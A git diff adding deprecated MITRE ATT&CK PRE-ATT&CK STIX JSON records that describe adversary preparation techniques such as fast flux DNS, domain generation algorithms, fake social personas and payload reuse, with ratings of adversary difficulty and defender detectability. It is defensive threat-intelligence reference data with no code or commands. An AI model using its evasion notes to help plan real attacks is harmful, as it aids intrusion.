\ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a.json new file mode 100644 index 0000000000000000000000000000000000000000..769a8f939d42ce0f36566cea743176b84b58e103 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--69f382be-308d-4d26-b021-e1cd6c7cacd2", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Procure required equipment and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1335).\n\nAn adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1335", + "external_id": "T1335" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1112", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ease and availability of current hardware and software, mobile phones (cash and go phones), and additional online technology simplifies adversary process to achieve this technique (and possibly without traceability). The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Outside of highly specific or rare HW, nearly impossible to detect and track.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf.json new file mode 100644 index 0000000000000000000000000000000000000000..c69f47607c472b1b682b273b45fb09657d64fcda --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--5ef75803-6ff8-4ac8-ac08-3c3d5180123e", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--23ecb7e0-0340-43d9-80a5-8971fe866ddf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Determine domain and IP address space", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1250).\n\nDomain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1250", + "external_id": "T1250" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public or easily obtainable information by design.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "AS and IANA data are easily available, existing research tools.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1027", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30.json new file mode 100644 index 0000000000000000000000000000000000000000..4cd3ab83aafea440a9e8e8477f55ed0845ce5620 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30.json @@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--c2fe1ae2-164f-45bb-975b-524994ea93e1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--248cbfdd-fec4-451b-b2a9-e46d4b268e30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Fast Flux DNS", + "description": "**This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).**\n\nA technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round robin IP address and short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1325", + "url": "https://attack.mitre.org/techniques/T1325" + }, + { + "description": "Jamie Riden. (2008, August 16). HOW FAST-FLUX SERVICE NETWORKS WORK. Retrieved March 6, 2017.", + "source_name": "HoneynetFastFlux" + }, + { + "description": "Misnomer. (2012, May 4). RESEARCH TO DETECTION \u2013 IDENTIFY FAST FLUX IN YOUR ENVIRONMENT. Retrieved March 6, 2017.", + "source_name": "MisnomerFastFlux" + }, + { + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref", + "description": "Mehta, L. (2014, December 17). Fast Flux Networks Working and Detection, Part 1. Retrieved March 6, 2017.", + "source_name": "MehtaFastFluxPt1" + }, + { + "source_name": "MehtaFastFluxPt2", + "description": "Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.", + "url": "https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:03.611Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true, + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1102", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Fast flux is generally simple for an adversary to set up and offers several advantages. Such advantages include limited audit trails for defenders to find, ease of operation for an adversary to maintain, and support for main nodes.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as IPS, domain registrars, and service providers are likely in the best position for detection.", + "x_mitre_detectable_by_common_defenses": "Partial" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--271e6d40-e191-421a-8f87-a8102452c201.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--271e6d40-e191-421a-8f87-a8102452c201.json new file mode 100644 index 0000000000000000000000000000000000000000..b3b5a27a620063cc0aac0274fefa18927b0a3e37 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--271e6d40-e191-421a-8f87-a8102452c201.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--9dec5fb5-4d65-4f70-94a9-5a6326ca13f7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--271e6d40-e191-421a-8f87-a8102452c201", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Develop social network persona digital footprint", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1342).\n\nBoth newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1342", + "external_id": "T1342" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + }, + { + "source_name": "RobinSageInterview", + "description": "Joan Goodchild. (2010, July 8). The Robin Sage experiment: Fake profile fools security pros. Retrieved March 6, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "persona-development" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1119", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "The only difference between an adversary conducting this technique and a typical user, is the adversary's intent - to target an individual for compromise.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Unless there is some threat intelligence reporting, these users are hard to differentiate.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe.json new file mode 100644 index 0000000000000000000000000000000000000000..e1e267eeee18161cd53f2fcbd8b7613aa902e044 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--78501561-0c2d-42d1-a532-9e197a910a49", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--274164c6-4297-42d4-84b5-2369e51013fe", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Domain Generation Algorithms (DGA)", + "description": "**This technique has been deprecated. Please use [Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002).**\n\nThe use of algorithms in malware to periodically generate a large number of domain names which function as rendezvous points for malware command and control servers. (Citation: DamballaDGA) (Citation: DambballaDGACyberCriminals)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1323", + "url": "https://attack.mitre.org/techniques/T1323" + }, + { + "description": "Damballa Day Before Zero Blog. (2012, March 5). Domain Generation Algorithms (DGA) in Stealthy Malware. Retrieved March 6, 2017.", + "source_name": "DamballaDGA" + }, + { + "description": "Damballa. (n.d.). DGAs in the Hands of Cyber-Criminals Examining The State Of The Art In Malware Evasion Techniques. Retrieved March 6, 2017.", + "source_name": "DambballaDGACyberCriminals" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-03-30T14:06:00.117Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": true, + "x_mitre_old_attack_id": "PRE-T1100", + "x_mitre_version": "2.0", + "x_mitre_difficulty_for_adversary_explanation": "This technique does not require a significant amount of sophistication while still being highly effective. It was popularized by the Conficker worms but is prevalent in crimeware such as Murofet and BankPatch.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "It is possible to detect the use of DGAs; however, defenders have largely not been successful at mitigating the domains because they are generally registered less than an hour before they are used and disposed of within 24 hours.", + "x_mitre_detectable_by_common_defenses": "Partial" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768.json new file mode 100644 index 0000000000000000000000000000000000000000..0dbdc307b9903a0ba63c4a471e71b0c5be39af89 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--4785170f-f9a4-4b9a-8841-44bf2673d9f7", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain/re-use payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1346).\n\nA payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1346", + "external_id": "T1346" + }, + { + "source_name": "SonyDestover", + "description": "Kurt Baumgartner. (2014, December 4). Sony/Destover: mystery North Korean actor\u2019s destructive and past network activity. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but detecting an adversary acquiring a payload would require the defender to be monitoring the code repository where the payload is stored. If the adversary re-uses payloads, this allows the defender to create signatures to detect using these known indicators of compromise (e.g., hashes).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1123", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--286cc500-4291-45c2-99a1-e760db176402.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--286cc500-4291-45c2-99a1-e760db176402.json new file mode 100644 index 0000000000000000000000000000000000000000..2ee5f9fac775826f5fd0d4c3fce9134b29d653e6 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--286cc500-4291-45c2-99a1-e760db176402.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--09237a38-5c4d-46a5-9879-d0a044b58a48", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--286cc500-4291-45c2-99a1-e760db176402", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party infrastructure services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1307).\n\nA wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1307", + "external_id": "T1307" + }, + { + "source_name": "LUCKYCAT2012", + "description": "Forward-Looking Threat Research Team. (2012). LUCKYCAT REDUX: Inside an APT Campaign with Multiple Targets in India and Japan. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1084", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca.json new file mode 100644 index 0000000000000000000000000000000000000000..0d374f891321975cabaa398d17b591628705bf9a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--56594e49-515d-4102-b40e-c1746c67dfc0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--288b3cc3-f4da-4250-ab8c-d8b5dbed94ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Identify web defensive services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1256).\n\nAn adversary can attempt to identify web defensive services as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1256", + "external_id": "T1256" + }, + { + "source_name": "NMAP WAF NSE", + "description": "Paulino Calderon. (n.d.). http-waf-detect. Retrieved April 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Active service detection may trigger an alert. Passive service enumeration is not detected.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary can passively detect services (e.g., [https://www.cloudflare.com/ CloudFlare] routing) or actively detect services (e.g., by purposefully tripping security defenses)", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1033", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a.json new file mode 100644 index 0000000000000000000000000000000000000000..cbb5a7ee0fdbac37043b8221d7e225b930fc6bb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7cc6c4d4-a009-428f-b9d8-dd1619e3f626", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2b9a666e-bd59-4f67-9031-ed41b428e04a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire OSINT data sets and information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1266).\n\nOpen source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1266", + "external_id": "T1266" + }, + { + "source_name": "RSA-APTRecon", + "description": "Rotem Kerner. (2015, October). RECONNAISSANCE: A Walkthrough of the \u201cAPT\u201d Intelligence Gathering Process. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "This activity is indistinguishable from legitimate business uses and easy to obtain.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Possible to gather digital intelligence about a person is easily aided by social networking sites, free/for fee people search engines, and publicly available information (e.g., county databases on tickets/DUIs).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1043", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "people-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9.json new file mode 100644 index 0000000000000000000000000000000000000000..4d2edbcc3056096ca08bc3fc59c4d07ca6c2b02a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--5da2b4d6-bb52-497c-8ba6-16b27b832433", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2c8a9df4-52a9-4770-94b3-5e95ab7d59f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Leverage compromised 3rd party resources", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nThe utilization of resources not owned by the adversary to launch exploits or operations. This includes utilizing equipment that was previously compromised or leveraging access gained by other methods (such as compromising an employee at a business partner location). (Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1375", + "url": "https://attack.mitre.org/techniques/T1375" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:21:59.520Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1152", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Conducting technique requires either nation-state level capabilities or large amounts of financing to coordinate multiple 3rd party resources to gain desired insight.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "While possible to detect, it requires a broader vantage point than is typical that provides increased insight and conducts extensive data analysis and correlation between events.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af.json new file mode 100644 index 0000000000000000000000000000000000000000..4e50a6cc37804582cf9d6de7e86ea9fecbd272f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--8816a3d1-495c-4040-9160-05b530b387f8", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2ec57bf1-fcc3-4c19-9516-79b7fde483af", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Untargeted client-side exploitation", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1370", + "url": "https://attack.mitre.org/techniques/T1370" + }, + { + "description": "Bill Marczak, Jakub Dalek, John Scott-Railton, Ron Deibert, Sarah McKune. (2015, April 10). China\u2019s Great Cannon. Retrieved March 9, 2017.", + "source_name": "CitizenLabGreatCannon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:30:45.039Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1147", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Commonly executed technique to place an exploit on an often widely used public web site intended for driveby delivery.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Defensive technologies exist to scan web content before delivery to the requested end user. However, this is not fool proof as some sites encrypt web communications and the adversary constantly moves to sites not previously flagged as malicious thus defeating this defense. Host-based defenses can also aid in detection/mitigation as well as detection by the web site that got compromised.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412.json new file mode 100644 index 0000000000000000000000000000000000000000..a3e397b510dd019582419f7d531c3ed195ae9e6b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--b1efae58-e72b-42e2-9cc8-e01ff7ab0086", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--2f442206-2983-4fc2-93fd-0a828e026412", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Disseminate removable media", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its 